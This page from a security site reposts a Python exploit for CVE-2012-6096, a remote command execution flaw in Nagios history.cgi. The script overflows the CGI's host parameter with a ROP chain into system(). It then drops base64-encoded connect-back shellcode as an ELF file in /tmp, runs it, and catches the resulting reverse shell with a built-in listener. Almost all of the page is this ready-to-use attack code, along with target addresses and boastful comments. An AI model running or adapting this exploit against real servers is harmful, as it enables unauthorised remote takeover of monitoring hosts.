首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nagios history.cgi Remote Command Execution Vulnerability
来源:blasty@fail0verflow.com 作者:blasty 发布时间:2013-01-14  

#!/usr/bin/python
#
# CVE-2012-6096 - Nagios history.cgi Remote Command Execution
# ===========================================================
# Another year, another reincarnation of classic and trivial
# bugs to exploit. This time we attack Nagios.. or more
# specifically, one of its CGI scripts. [1]
#
# The Nagios code is an amazing monster. It reminds me a
# lot of some of my early experiments in C, back when I
# still had no clue what I was doing. (Ok, fair enough,
# I still don't, heheh.)
#
# Ok, I'll come clean. This exploit doesn't exactly
# defeat FORTIFY. This approach is likely to work just FINE
# on other crippled distro's though, think of stuff like
# ArchLinux, Slackware, and all those Gentoo kids twiddling
# their CFLAGS. [2] (Oh and hey, BSD and stuff!)
#
# I do some very stupid shit(tm) here that might make an
# exploit coder or two cringe. My sincere apologies for that.
#
# Cold beer goes out to my friends who are still practicing
# this dying but interesting type of art:
#
#   * brainsmoke * masc * iZsh * skier_ * steve *
#
# -- blasty <blasty@fail0verflow.com> / 2013-01-08
#
# References:
# [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109
# [2] http://www.funroll-loops.info/
#
# P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!
# Next time you rebrand an exploit at least show some diligence and
# add some additional targets or improvements, so we can all profit!
#
# P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!
#

import os, sys, socket, struct, urllib, threading, SocketServer, time
from base64 import b64encode

SocketServer.TCPServer.allow_reuse_address = True

targets = [
 {
  "name"      : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
  "smash_len"  : 0xc37,
  "unescape"   : 0x0804b620,
  "popret"     : 0x08048fe4,
  "hostbuf"    : 0x080727a0,
  "system_plt" : 0x08048c7c
 }
]

def u32h(v):
 return struct.pack("<L", v).encode('hex')

def u32(v, hex = False):
 return struct.pack("<L", v)

# Tiny ELF stub based on:
# http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
def make_elf(sc):
 elf_head = \
  "7f454c46010101000000000000000000" + \
  "02000300010000005480040834000000" + \
  "00000000000000003400200001000000" + \
  "00000000010000000000000000800408" + \
  "00800408" + u32h(0x54+len(sc))*2  + \
  "0500000000100000"

 return elf_head.decode("hex") + sc

# interactive connectback listener
class connectback_shell(SocketServer.BaseRequestHandler):
 def handle(self):
  print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]
  print "[**] This shell is powered by insane amounts of illegal substances"
 
  s = self.request
 
  import termios, tty, select, os
  old_settings = termios.tcgetattr(0)

  try:
   tty.setcbreak(0)
   c = True

   os.write(s.fileno(), "id\nuname -a\n")

   while c:
    for i in select.select([0, s.fileno()], [], [], 0)[0]:
     c = os.read(i, 1024)
     if c:
      if i == 0:
       os.write(1, c)
 
      os.write(s.fileno() if i == 0 else 1, c)
  except KeyboardInterrupt: pass
  finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
 
  return
 
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
 pass

if len(sys.argv) != 5:
 print "\n  >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
 print "  >> \"Jetzt geht's Nagi-los!\"\n"
 print "  usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0])
 print "  targets:"

 i = 0

 for target in targets:
  print " %02d) %s" % (i, target['name'])
  i = i+1
 
 print ""
 sys.exit(-1)

target_no = int(sys.argv[4])

if target_no < 0 or target_no > len(targets):
 print "Invalid target specified"
 sys.exit(-1)

target = targets[ int(sys.argv[4]) ]

# comment this shit if you want to setup your own listener
server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

# shellcode to be executed
# vanilla x86/linux connectback written by a dutch gentleman
# close to a decade ago.
cback = \
 "31c031db31c951b10651b10151b10251" + \
 "89e1b301b066cd8089c231c031c95151" + \
 "68badc0ded6668b0efb102665189e7b3" + \
 "1053575289e1b303b066cd8031c939c1" + \
 "740631c0b001cd8031c0b03f89d3cd80" + \
 "31c0b03f89d3b101cd8031c0b03f89d3" + \
 "b102cd8031c031d250686e2f7368682f" + \
 "2f626989e3505389e1b00bcd8031c0b0" + \
 "01cd80"

cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

# Eww.. so there's some characters that dont survive the trip..
# yes, even with the unescape() call in our return-chain..
# initially I was going to use some /dev/tcp based connectback..
# but /dev/tcp isn't available/accesible everywhere, so instead
# we drop an ELF into /tmp and execute that. The '>' characters
# also doesn't survive the trip so we work around this by using
# the tee(1) utility.
# If your target has a /tmp that is mounted with noexec flag,
# is severely firewalled or guarded by trained (watch)dogs..
# you might want to reconsider this approach!
cmd  = \
 "rm -rf /tmp/x;" + \
 "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \
 "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

# Spaces (0x20) are also a problem, they always ends up as '+' :-(
# so apply some olde trick and rely on $IFS for argv separation
cmd = cmd.replace(" ", "${IFS}")

# Basic return-2-whatever/ROP chain.
# We return into cgi_input_unescape() to get rid of
# URL escaping in a static buffer we control, and then
# we return into system@plt for the moneyshot.
#
# Ergo sum:
# There's no memoryleak or whatever needed to leak libc
# base and bypass ASLR.. This entire Nagios PoS is stringed
# together by system() calls, so pretty much every single one
# of their little silly binaries comes with a PLT entry for
# system(), huzzah!
rop = [
 u32(target['unescape']),
 u32(target['popret']),
 u32(target['hostbuf']),
 u32(target['system_plt']),
 u32(0xdeafbabe),
 u32(target['hostbuf'])
]

# Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
# out of the box. Building HTTP requests from scratch is so 90ies..
params = urllib.urlencode({
 'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)
})

print "[>>] CL1Q .."
f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)

print "[>>] CL4Q .."
f.read()

# TRIAL PERIOD ACTIVE, LOL!
time.sleep(0x666)

server.shutdown()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java Applet JMX Remote Code Ex
·Microsoft Lync 2012 Code Execu
·Serva v2.0.0 DNS Server QueryN
·Ruby on Rails XML Processor YA
·Serva v2.0.0 HTTP Server GET R
·Internet Explorer 8 Fixed Col
·Freesshd Authentication Bypass
·Honeywell Tema Remote Installe
·Nagios3 history.cgi Host Comma
·Microsoft Internet Explorer Op
·eXtplorer 2.1 Arbitrary File U
·Atheme IRC Services 7.0.5 Deni
  推荐广告
CopyRight © 2002-2025 VFocuS.Net All Rights Reserved